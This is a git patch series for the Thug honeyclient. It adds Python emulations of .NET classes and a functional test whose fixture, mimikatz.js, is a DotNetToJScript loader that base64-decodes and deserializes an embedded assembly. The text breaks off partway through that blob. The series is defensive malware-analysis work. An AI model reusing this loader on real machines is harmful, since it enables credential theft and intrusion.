From 631acad7b95b0c089aa6ee3c04ce44d850144fbd Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera <buffer@olografix.org>
Date: Mon, 11 Mar 2024 14:34:40 +0100
Subject: [PATCH 01/12] [ActiveX][.NET API] System.Text.ASCIIEncoding

---
 thug/ActiveX/modules/System/Text/ASCIIEncoding.py | 11 +++++++++++
 thug/ActiveX/modules/System/Text/__init__.py      |  5 +++++
 2 files changed, 16 insertions(+)
 create mode 100644 thug/ActiveX/modules/System/Text/ASCIIEncoding.py
 create mode 100644 thug/ActiveX/modules/System/Text/__init__.py

diff --git a/thug/ActiveX/modules/System/Text/ASCIIEncoding.py b/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
new file mode 100644
index 0000000000..a142552f5e
--- /dev/null
+++ b/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
@@ -0,0 +1,11 @@
+import logging
+
+log = logging.getLogger("Thug")
+
+
+def GetByteCount_2(self, chars):
+    return len(chars.encode("utf-8"))
+
+
+def GetBytes_4(self, chars):
+    return list(chars)
diff --git a/thug/ActiveX/modules/System/Text/__init__.py b/thug/ActiveX/modules/System/Text/__init__.py
new file mode 100644
index 0000000000..a41479af82
--- /dev/null
+++ b/thug/ActiveX/modules/System/Text/__init__.py
@@ -0,0 +1,5 @@
+__all__ = [
+    "ASCIIEncoding",
+]
+
+from . import ASCIIEncoding

From e68068263946cc9005790288c29b5f7ccdbfb927 Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera <buffer@olografix.org>
Date: Mon, 11 Mar 2024 14:36:03 +0100
Subject: [PATCH 02/12] [ActiveX][.NET API] System.Collections.ArrayList

---
 thug/ActiveX/modules/System/Collections/ArrayList.py | 12 ++++++++++++
 thug/ActiveX/modules/System/Collections/__init__.py  |  5 +++++
 2 files changed, 17 insertions(+)
 create mode 100644 thug/ActiveX/modules/System/Collections/ArrayList.py
 create mode 100644 thug/ActiveX/modules/System/Collections/__init__.py

diff --git a/thug/ActiveX/modules/System/Collections/ArrayList.py b/thug/ActiveX/modules/System/Collections/ArrayList.py
new file mode 100644
index 0000000000..59d33b958e
--- /dev/null
+++ b/thug/ActiveX/modules/System/Collections/ArrayList.py
@@ -0,0 +1,12 @@
+import logging
+
+log = logging.getLogger("Thug")
+
+
+def Add(self, value):
+    self.arraylist.append(value)
+    return self.arraylist.index(value)
+
+
+def ToArray(self):
+    return list(self.arraylist)
diff --git a/thug/ActiveX/modules/System/Collections/__init__.py b/thug/ActiveX/modules/System/Collections/__init__.py
new file mode 100644
index 0000000000..2adc3a95ad
--- /dev/null
+++ b/thug/ActiveX/modules/System/Collections/__init__.py
@@ -0,0 +1,5 @@
+__all__ = [
+    "ArrayList",
+]
+
+from . import ArrayList

From 9ee6f5c25c9d8782be379b8a7ac4aa6fc34bc373 Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera <buffer@olografix.org>
Date: Mon, 11 Mar 2024 14:36:29 +0100
Subject: [PATCH 03/12] [ActiveX][.NET API] System.IO.MemoryStream

---
 thug/ActiveX/modules/System/IO/MemoryStream.py | 15 +++++++++++++++
 thug/ActiveX/modules/System/IO/__init__.py     |  5 +++++
 2 files changed, 20 insertions(+)
 create mode 100644 thug/ActiveX/modules/System/IO/MemoryStream.py
 create mode 100644 thug/ActiveX/modules/System/IO/__init__.py

diff --git a/thug/ActiveX/modules/System/IO/MemoryStream.py b/thug/ActiveX/modules/System/IO/MemoryStream.py
new file mode 100644
index 0000000000..b22fc1ef43
--- /dev/null
+++ b/thug/ActiveX/modules/System/IO/MemoryStream.py
@@ -0,0 +1,15 @@
+import io
+import logging
+
+log = logging.getLogger("Thug")
+
+
+def Write(self, buffer, offset=0, count=-1):
+    buflen = count if count > -1 else len(buffer)
+    bufdat = buffer[: buflen - 1]
+
+    streamdata = self.stream.getvalue()
+    data = f"{streamdata[:offset]}{bufdat}{streamdata[offset:]}"
+
+    self.stream = io.BytesIO(data.encode())
+    self.Position = len(data)
diff --git a/thug/ActiveX/modules/System/IO/__init__.py b/thug/ActiveX/modules/System/IO/__init__.py
new file mode 100644
index 0000000000..f764e2f7af
--- /dev/null
+++ b/thug/ActiveX/modules/System/IO/__init__.py
@@ -0,0 +1,5 @@
+__all__ = [
+    "MemoryStream",
+]
+
+from . import MemoryStream

From 799680c2bf5304bc2880c254597a1b00c25f07a2 Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera <buffer@olografix.org>
Date: Mon, 11 Mar 2024 14:37:07 +0100
Subject: [PATCH 04/12] [ActiveX][.NET API] System.Runtime

---
 thug/ActiveX/modules/System/Runtime/Activator.py   | 11 +++++++++++
 thug/ActiveX/modules/System/Runtime/Delegate.py    | 14 ++++++++++++++
 .../Formatters/Binary/BinaryFormatter.py           | 10 ++++++++++
 .../Serialization/Formatters/Binary/__init__.py    |  5 +++++
 .../Runtime/Serialization/Formatters/__init__.py   |  5 +++++
 .../System/Runtime/Serialization/__init__.py       |  5 +++++
 thug/ActiveX/modules/System/Runtime/__init__.py    |  5 +++++
 7 files changed, 55 insertions(+)
 create mode 100644 thug/ActiveX/modules/System/Runtime/Activator.py
 create mode 100644 thug/ActiveX/modules/System/Runtime/Delegate.py
 create mode 100644 thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
 create mode 100644 thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/__init__.py
 create mode 100644 thug/ActiveX/modules/System/Runtime/Serialization/Formatters/__init__.py
 create mode 100644 thug/ActiveX/modules/System/Runtime/Serialization/__init__.py
 create mode 100644 thug/ActiveX/modules/System/Runtime/__init__.py

diff --git a/thug/ActiveX/modules/System/Runtime/Activator.py b/thug/ActiveX/modules/System/Runtime/Activator.py
new file mode 100644
index 0000000000..adeb438062
--- /dev/null
+++ b/thug/ActiveX/modules/System/Runtime/Activator.py
@@ -0,0 +1,11 @@
+import logging
+
+log = logging.getLogger("Thug")
+
+
+class Activator:
+    def __init__(self, delegate):
+        self.delegate = delegate
+
+    def CreateInstance(self, Type):
+        pass
diff --git a/thug/ActiveX/modules/System/Runtime/Delegate.py b/thug/ActiveX/modules/System/Runtime/Delegate.py
new file mode 100644
index 0000000000..37b12b8677
--- /dev/null
+++ b/thug/ActiveX/modules/System/Runtime/Delegate.py
@@ -0,0 +1,14 @@
+import logging
+
+from .Activator import Activator
+
+log = logging.getLogger("Thug")
+
+
+class Delegate:
+    def __init__(self, code):
+        self.code = code
+
+    def DynamicInvoke(self, args):
+        log.warning(self.code.decode())
+        return Activator(self)
diff --git a/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
new file mode 100644
index 0000000000..411bcee3ab
--- /dev/null
+++ b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
@@ -0,0 +1,10 @@
+import logging
+
+log = logging.getLogger("Thug")
+
+from thug.ActiveX.modules.System.Runtime.Delegate import Delegate
+
+
+def Deserialize_2(self, buf):
+    data = buf.stream.getvalue()
+    return Delegate(data)
diff --git a/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/__init__.py b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/__init__.py
new file mode 100644
index 0000000000..859320ae0f
--- /dev/null
+++ b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/__init__.py
@@ -0,0 +1,5 @@
+__all__ = [
+    "BinaryFormatter",
+]
+
+from . import BinaryFormatter
diff --git a/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/__init__.py b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/__init__.py
new file mode 100644
index 0000000000..99b57c870f
--- /dev/null
+++ b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/__init__.py
@@ -0,0 +1,5 @@
+__all__ = [
+    "Binary",
+]
+
+from . import Binary
diff --git a/thug/ActiveX/modules/System/Runtime/Serialization/__init__.py b/thug/ActiveX/modules/System/Runtime/Serialization/__init__.py
new file mode 100644
index 0000000000..1434bd5600
--- /dev/null
+++ b/thug/ActiveX/modules/System/Runtime/Serialization/__init__.py
@@ -0,0 +1,5 @@
+__all__ = [
+    "Formatters",
+]
+
+from . import Formatters
diff --git a/thug/ActiveX/modules/System/Runtime/__init__.py b/thug/ActiveX/modules/System/Runtime/__init__.py
new file mode 100644
index 0000000000..afd4db59fd
--- /dev/null
+++ b/thug/ActiveX/modules/System/Runtime/__init__.py
@@ -0,0 +1,5 @@
+__all__ = [
+    "Serialization",
+]
+
+from . import Serialization

From a808238e0bb51d356a20ef23a4aa74bde3c2ee8b Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera <buffer@olografix.org>
Date: Mon, 11 Mar 2024 14:37:44 +0100
Subject: [PATCH 05/12] [ActiveX][.NET API]
 System.Cryptography.FromBase64Transform

---
 .../System/Security/Cryptography/FromBase64Transform.py   | 8 ++++++++
 .../modules/System/Security/Cryptography/__init__.py      | 5 +++++
 thug/ActiveX/modules/System/Security/__init__.py          | 5 +++++
 3 files changed, 18 insertions(+)
 create mode 100644 thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py
 create mode 100644 thug/ActiveX/modules/System/Security/Cryptography/__init__.py
 create mode 100644 thug/ActiveX/modules/System/Security/__init__.py

diff --git a/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py b/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py
new file mode 100644
index 0000000000..abc7362ce3
--- /dev/null
+++ b/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py
@@ -0,0 +1,8 @@
+import base64
+import logging
+
+log = logging.getLogger("Thug")
+
+
+def TransformFinalBlock(self, buffer, offset, count):
+    return bytes(base64.b64decode("".join(buffer[offset : offset + count])))
diff --git a/thug/ActiveX/modules/System/Security/Cryptography/__init__.py b/thug/ActiveX/modules/System/Security/Cryptography/__init__.py
new file mode 100644
index 0000000000..3a892aa95b
--- /dev/null
+++ b/thug/ActiveX/modules/System/Security/Cryptography/__init__.py
@@ -0,0 +1,5 @@
+__all__ = [
+    "FromBase64Transform",
+]
+
+from . import FromBase64Transform
diff --git a/thug/ActiveX/modules/System/Security/__init__.py b/thug/ActiveX/modules/System/Security/__init__.py
new file mode 100644
index 0000000000..7535a16722
--- /dev/null
+++ b/thug/ActiveX/modules/System/Security/__init__.py
@@ -0,0 +1,5 @@
+__all__ = [
+    "Cryptography",
+]
+
+from . import Cryptography

From e1967ce4e19a99f50404b61181a61157608224d1 Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera <buffer@olografix.org>
Date: Mon, 11 Mar 2024 14:39:06 +0100
Subject: [PATCH 06/12] [ActiveX][.NET API] System

---
 thug/ActiveX/CLSID.py                   | 60 +++++++++++++++++++++++++
 thug/ActiveX/modules/System/__init__.py |  7 +++
 2 files changed, 67 insertions(+)
 create mode 100644 thug/ActiveX/modules/System/__init__.py

diff --git a/thug/ActiveX/CLSID.py b/thug/ActiveX/CLSID.py
index b5e482bf7e..296ed660fa 100644
--- a/thug/ActiveX/CLSID.py
+++ b/thug/ActiveX/CLSID.py
@@ -16,6 +16,8 @@
 # Foundation, Inc., 59 Temple Place, Suite 330, Boston,
 # MA  02111-1307  USA
 
+import io
+
 from .modules import AcroPDF
 from .modules import AdodbRecordset
 from .modules import AdodbStream
@@ -94,6 +96,7 @@
 from .modules import StormMps
 from .modules import SymantecAppStream
 from .modules import SymantecBackupExec
+from .modules import System
 from .modules import StreamAudioChainCast
 from .modules import Toshiba
 from .modules import UniversalUpload
@@ -1288,6 +1291,63 @@
             "Set_MonthText11": SymantecBackupExec.Set_MonthText11,
         },
     },
+    # System.Collections.ArrayList
+    {
+        "id": (),
+        "name": ("system.collections.arraylist",),
+        "attrs": {
+            "arraylist": [],
+        },
+        "funcattrs": {},
+        "methods": {
+            "Add": System.Collections.ArrayList.Add,
+            "ToArray": System.Collections.ArrayList.ToArray,
+        },
+    },
+    # System.IO.MemoryStream
+    {
+        "id": (),
+        "name": ("system.io.memorystream",),
+        "attrs": {
+            "stream": io.BytesIO(),
+            "Position": 0,
+        },
+        "funcattrs": {},
+        "methods": {
+            "Write": System.IO.MemoryStream.Write,
+        },
+    },
+    # System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
+    {
+        "id": (),
+        "name": ("system.runtime.serialization.formatters.binary.binaryformatter",),
+        "attrs": {},
+        "funcattrs": {},
+        "methods": {
+            "Deserialize_2": System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Deserialize_2,
+        },
+    },
+    # System.Security.Cryptography.FromBase64Transform
+    {
+        "id": (),
+        "name": ("system.security.cryptography.frombase64transform",),
+        "attrs": {},
+        "funcattrs": {},
+        "methods": {
+            "TransformFinalBlock": System.Security.Cryptography.FromBase64Transform.TransformFinalBlock,
+        },
+    },
+    # System.Text.ASCIIEncoding
+    {
+        "id": (),
+        "name": ("system.text.asciiencoding",),
+        "attrs": {},
+        "funcattrs": {},
+        "methods": {
+            "GetByteCount_2": System.Text.ASCIIEncoding.GetByteCount_2,
+            "GetBytes_4": System.Text.ASCIIEncoding.GetBytes_4,
+        },
+    },
     # StreamAudioChainCast
     {
         "id": ("2253F320-AB68-4A07-917D-4F12D8884A06",),
diff --git a/thug/ActiveX/modules/System/__init__.py b/thug/ActiveX/modules/System/__init__.py
new file mode 100644
index 0000000000..fdbcdafd17
--- /dev/null
+++ b/thug/ActiveX/modules/System/__init__.py
@@ -0,0 +1,7 @@
+__all__ = ["Collections", "IO", "Runtime", "Security", "Text"]
+
+from . import Collections
+from . import IO
+from . import Runtime
+from . import Security
+from . import Text

From 656a9f05c2c80323939c185ee81308a2ee8eebd2 Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera <buffer@olografix.org>
Date: Mon, 11 Mar 2024 14:57:44 +0100
Subject: [PATCH 07/12] Minor change

---
 thug/ActiveX/modules/System/Runtime/Delegate.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/thug/ActiveX/modules/System/Runtime/Delegate.py b/thug/ActiveX/modules/System/Runtime/Delegate.py
index 37b12b8677..8420e4ceb3 100644
--- a/thug/ActiveX/modules/System/Runtime/Delegate.py
+++ b/thug/ActiveX/modules/System/Runtime/Delegate.py
@@ -10,5 +10,5 @@ def __init__(self, code):
         self.code = code
 
     def DynamicInvoke(self, args):
-        log.warning(self.code.decode())
+        # log.warning(self.code.decode())
         return Activator(self)

From 9f2818a3820347f170a3f16fbaa0a74d4b2658fd Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera <buffer@olografix.org>
Date: Mon, 11 Mar 2024 14:58:21 +0100
Subject: [PATCH 08/12] [Unit tests] Add sample mimikatz.js

---
 tests/functional/test_exploits.py  |  13 ++
 tests/samples/exploits/mimikatz.js | 306 +++++++++++++++++++++++++++++
 2 files changed, 319 insertions(+)
 create mode 100644 tests/samples/exploits/mimikatz.js

diff --git a/tests/functional/test_exploits.py b/tests/functional/test_exploits.py
index 56efe0be33..9837ca85ca 100644
--- a/tests/functional/test_exploits.py
+++ b/tests/functional/test_exploits.py
@@ -1438,3 +1438,16 @@ def test_Qakbot(self, caplog):
         ]
 
         self.do_perform_test(caplog, sample, expected, useragent="osx10chrome97")
+
+    def test_Mimikatz(self, caplog):
+        sample = os.path.join(self.exploits_path, "mimikatz.js")
+        expected = [
+            "ActiveXObject: system.text.asciiencoding",
+            "[System.Text.ASCIIEncoding.GetByteCount_2] length = 20164",
+            "ActiveXObject: system.security.cryptography.frombase64transform",
+            "ActiveXObject: system.io.memorystream",
+            "ActiveXObject: system.runtime.serialization.formatters.binary.binaryformatter",
+            "ActiveXObject: system.collections.arraylist",
+        ]
+
+        self.do_perform_test(caplog, sample, expected)
diff --git a/tests/samples/exploits/mimikatz.js b/tests/samples/exploits/mimikatz.js
new file mode 100644
index 0000000000..1305ca9343
--- /dev/null
+++ b/tests/samples/exploits/mimikatz.js
@@ -0,0 +1,306 @@
+<script language="JScript">
+	// Mimikatz Loader
+	// Built with DotNetToJScript.
+	function Exec()
+	{
+		function setversion() {
+		new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
+		}
+		function debug(s) {}
+		function base64ToStream(b) {
+			var enc = new ActiveXObject("System.Text.ASCIIEncoding");
+			var length = enc.GetByteCount_2(b);
+			alert("[System.Text.ASCIIEncoding.GetByteCount_2] length = " + length);
+			var ba = enc.GetBytes_4(b);
+			var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
+			ba = transform.TransformFinalBlock(ba, 0, length);
+			var ms = new ActiveXObject("System.IO.MemoryStream");
+			ms.Write(ba, 0, (length / 4) * 3);
+			ms.Position = 0;
+			return ms;
+		}
+
+		var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
+		"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
+		"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
+		"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
+		"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
+		"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
+		"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
+		"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
+		"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
+		"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
+		"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
+		"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
+		"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
+		"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
+		"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
+		"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
+		"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
+		"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
+		"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
+		"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
+		"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
+		"ZW1ibHkGFwAAAARMb2FkCg8MAAAAADYAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
+		"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAs6ZgWgAAAAAA"+
+		"AAAA4AACIQsBCwAALgAAAAYAAAAAAACeTAAAACAAAABgAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
+		"AAAAAAAAAKAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAATEwA"+
+		"AE8AAAAAYAAAqAIAAAAAAAAAAAAAAAAAAAAAAAAAgAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
+		"AAAALnRleHQAAACkLAAAACAAAAAuAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAqAIAAABg"+
+		"AAAABAAAADAAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAgAAAAAIAAAA0AAAAAAAAAAAA"+
+		"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAIBMAAAAAAAASAAAAAIABQDALAAAjB8AAAEAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEzADABkAAAAB"+
+		"AAARABIADwAoBAAACgNqWCgFAAAKAAYLKwAHKgAAABMwBwBSAAAAAgAAEQAoAgAABiZyAQAAcCAA"+
+		"AABAGBYZFhYoAwAABgoGF3MHAAAKCwcYcwgAAAoMILUBAAAoCQAACg0ICXMKAAAKEwQRBBdvCwAA"+
+		"CgARBCgMAAAKACpuAigNAAAKAAAoBAAABgByEQAAcCgHAAAGAAAqAAAbMAQAVQAAAAMAABEAIABA"+
+		"AACNEwAAAQpzDgAACgsAKwwABwYWCG8PAAAKAAACBhYGjmlvEAAACiUMFv4CEwQRBC3eB28RAAAK"+
+		"Dd4SBxT+ARMEEQQtBwdvEgAACgDcAAkqAAAAARAAAAIAEgAuQAASAAAAABswBgDUBwAABAAAEQBz"+
+		"EwAACgoUCwAGAm8UAAAKDAhzFQAACg0JcxYAAAoTBQARBW8XAAAKbxgAAAoTLTiDAAAAES1vGQAA"+
+		"ChMGABEGbxoAAApyyAAAcCgbAAAKLA0oHAAACh7+ARb+ASsBFwATLhEuLRQAEQZvHQAAChMEEQQo"+
+		"BgAABgsrTREGbxoAAApy6gAAcCgbAAAKLA0oHAAAChr+ARb+ASsBFwATLhEuLRQAEQZvHQAAChME"+
+		"EQQoBgAABgsrEQARLW8eAAAKEy4RLjpt////3hQRLRT+ARMuES4tCBEtbxIAAAoA3AAA3iETBwAr"+
+		"CwARB28fAAAKEwcAEQcU/gEW/gETLhEuLecA3gAAB3MJAAAGEwgRCG8LAAAGFv4BEy4RLi0pAH4g"+
+		"AAAKEQhvDQAABntAAAAEfp0AAAR+nwAABCgSAAAGgAUAAAQAKycAfiAAAAoRCG8OAAAGe20AAAR+"+
+		"nQAABH6fAAAEKBIAAAaABQAABAAWEwkrfgB+BQAABBEIbw8AAAYRCY8JAAACe5EAAAQoAQAABhEI"+
+		"bw8AAAYRCY8JAAACe5IAAAR+nQAABH6fAAAEKBIAAAYTChEIbxAAAAYRCG8PAAAGEQmPCQAAAnuT"+
+		"AAAEEQoRCG8PAAAGEQmPCQAAAnuSAAAEKCEAAAoAABEJF1gTCREJEQhvDAAABnuJAAAE/gQTLhEu"+
+		"Omn///9+BQAABBMLEQhvCwAABhb+ARMuES4tGwASCygiAAAKEQhvDQAABns2AAAEWWoTDAArGAAS"+
+		"CygEAAAKEQhvDgAABntjAAAEWRMMABEIbwsAAAYW/gETLhEuLSEAfgUAAAQRCG8NAAAGe1AAAAR7"+
+		"KwAABCgBAAAGEw0AKx8AfgUAAAQRCG8OAAAGe30AAAR7KwAABCgBAAAGEw0AEg7+FQ0AAAIRDdAN"+
+		"AAACKCMAAAooJAAACqUNAAACEw7QDQAAAigjAAAKKCUAAAoTDxENExASDnuiAAAEExERDRMSOCoB"+
+		"AAAAEhP+FQ0AAAIRDRERKAEAAAYTFBEU0A0AAAIoIwAACigkAAAKpQ0AAAITE34FAAAEEg57oQAA"+
+		"BCgBAAAGExUWEwk4igAAAAAREh4YEQlaWCgmAAAK0RMXERcfDGPRExgRFyD/DwAAX9ETGREYEy8R"+
+		"LxYuDREvGS4KES8fCi4oK0krRxEVERkoAQAABhMWERYoJwAAChMaERYRGhEMaVgoKAAACgArIxEV"+
+		"ERkoAQAABhMWERYoKQAAChMbERYRGxEMWCgqAAAKACsAABEJF1gTCREJEg57ogAABG4RD2pZGGpb"+
+		"af4EEy4RLjpZ////EQ0RESgBAAAGExIRERITe6IAAARYExERExMOERARESgBAAAGExASE3uiAAAE"+
+		"Fv4BFv4BEy4RLi0CKwkAFxMuOM7+//8RCG8LAAAGFv4BEy4RLi1PAH4FAAAEEQhvDwAABhePCQAA"+
+		"AnuRAAAEKAEAAAYTHH4FAAAEEQhvDQAABntMAAAEeysAAAQoAQAABhMdER0fECgBAAAGKCcAAAoT"+
+		"HgArTQB+BQAABBEIbw8AAAYXjwkAAAJ7kQAABCgBAAAGExx+BQAABBEIbw4AAAZ7eQAABHsrAAAE"+
+		"KAEAAAYTHREdHxAoAQAABignAAAKEx4AEQhvCwAABhb+ARMuES46fwEAAAAWEyE4HgEAAAB+BQAA"+
+		"BB8UESFaEQhvDQAABntMAAAEeysAAARYKAEAAAYTIhEiHxAoAQAABignAAAKEyN+BQAABBEIbw8A"+
+		"AAYXjwkAAAJ7kQAABBEjER5ZWCgBAAAGEyR+BQAABBEiHwwoAQAABignAAAKKAEAAAYTJRElKCsA"+
+		"AAoTJhEmchABAHAoGwAAChb+ARMuES4tBgA4kQAAAAARJigTAAAGEycA3gQmAN53ABYTKCtlAH4F"+
+		"AAAEESQoJwAACigBAAAGEykRKRgoAQAABigrAAAKEyoRJxEqKBQAAAYTKxEkESsoLAAACigoAAAK"+
+		"ABEkGigBAAAGEyQRKnIQAQBwKBsAAAoW/gETLhEuLQIrDBEoF1gTKAAXEy4rlhEhF1gTIQAAFxMu"+
+		"ONn+//8RCG8NAAAGe0AAAAQTIH4FAAAEEQhvDQAABnszAAAEKC0AAAoTH34gAAAKFhEffiAAAAoW"+
+		"fiAAAAooFQAABhMsESwVKBYAAAYmADh6AQAAABYTITgeAQAAAH4FAAAEHxQRIVoRCG8OAAAGe3kA"+
+		"AAR7KwAABFgoAQAABhMiESIfECgBAAAGKCcAAAoTI34FAAAEEQhvDwAABhePCQAAAnuRAAAEESMR"+
+		"HllYKAEAAAYTJH4FAAAEESIfDCgBAAAGKCcAAAooAQAABhMlESUoKwAAChMmESZyEAEAcCgbAAAK"+
+		"Fv4BEy4RLi0GADiRAAAAABEmKBMAAAYTJwDeBCYA3ncAFhMoK2UAfgUAAAQRJCgnAAAKKAEAAAYT"+
+		"KREpGCgBAAAGKCsAAAoTKhEnESooFAAABhMrESQRKyguAAAKKCoAAAoAESQeKAEAAAYTJBEqchAB"+
+		"AHAoGwAAChb+ARMuES4tAisMESgXWBMoABcTLiuWESEXWBMhAAAXEy442f7//xEIbw4AAAZ7bQAA"+
+		"BBMgfgUAAAQRCG8OAAAGe2EAAAQoLQAAChMffiAAAAoWER9+IAAAChZ+IAAACigVAAAGEywRLBUo"+
+		"FgAABiYAKgE0AAACADAAmsoAFAAAAAAAAAkA2eIAIR0AAAEAAHkFDYYFBB0AAAEAAPgGDQUHBB0A"+
+		"AAEbMAMA5QAAAAUAABECKA0AAAoAAAMZF3MvAAAKCgAGczAAAAoLAgcoAQAAK30GAAAEBgJ8BgAA"+
+		"BHsqAAAEbhZvMQAACiYHbzIAAAoMAgcoAgAAK30HAAAEAigLAAAGFv4BEwQRBC0QAAIHKAMAACt9"+
+		"CAAABAArDgACBygEAAArfQkAAAQAAgJ8BwAABHuJAAAEjQkAAAJ9CgAABBYNKx0AAnsKAAAECY8J"+
+		"AAACBygFAAArgQkAAAIACRdYDQkCewoAAASOaf4EEwQRBC3SAgMoMwAACn0LAAAEAN4SBhT+ARME"+
+		"EQQtBwZvEgAACgDcAAAqAAAAARAAAAIAEQC/0AASAAAAABswAwDiAAAABgAAEQIoDQAACgAAAxYD"+
+		"jmlzNAAACgoABnMwAAAKCwIHKAEAACt9BgAABAYCfAYAAAR7KgAABG4WbzEAAAomB28yAAAKDAIH"+
+		"KAIAACt9BwAABAIoCwAABhb+ARMEEQQtEAACBygDAAArfQgAAAQAKw4AAgcoBAAAK30JAAAEAAIC"+
+		"fAcAAAR7iQAABI0JAAACfQoAAAQWDSsdAAJ7CgAABAmPCQAAAgcoBQAAK4EJAAACAAkXWA0JAnsK"+
+		"AAAEjmn+BBMEEQQt0gIDfQsAAAQA3hIGFP4BEwQRBC0HBm8SAAAKANwAACoAAAEQAAACABMAus0A"+
+		"EgAAAAATMAIASQAAAAcAABEAAtADAAAbKCMAAAooJQAACm81AAAKCgYZKDYAAAoLEgEoNwAACtAD"+
+		"AAAbKCMAAAooJAAACqUDAAAbDBIBKDgAAAoACA0rAAkqAAAAEzACABwAAAAIAAARACAAAQAACgYC"+
